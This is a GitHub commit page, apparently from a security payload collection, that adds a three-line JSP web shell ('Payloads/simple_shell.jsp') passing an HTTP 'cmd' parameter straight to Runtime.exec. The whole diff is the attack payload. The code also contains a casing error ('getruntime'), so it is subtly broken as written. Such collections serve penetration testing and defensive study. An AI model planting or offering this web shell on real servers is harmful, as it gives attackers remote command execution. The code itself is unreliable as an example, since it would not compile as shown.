Skip to content

Commit

Permalink
Simple shell added by shipcod3
Browse files Browse the repository at this point in the history
  • Loading branch information
danielmiessler committed Aug 5, 2015
1 parent 2d77ee3 commit c9fb007
Showing 1 changed file with 3 additions and 0 deletions.
3 changes: 3 additions & 0 deletions Payloads/simple_shell.jsp
Original file line number Diff line number Diff line change
@@ -0,0 +1,3 @@
+<%
+Runtime.getruntime().exec(request.getParameter("cmd"))
+%>

0 comments on commit c9fb007

Please sign in to comment.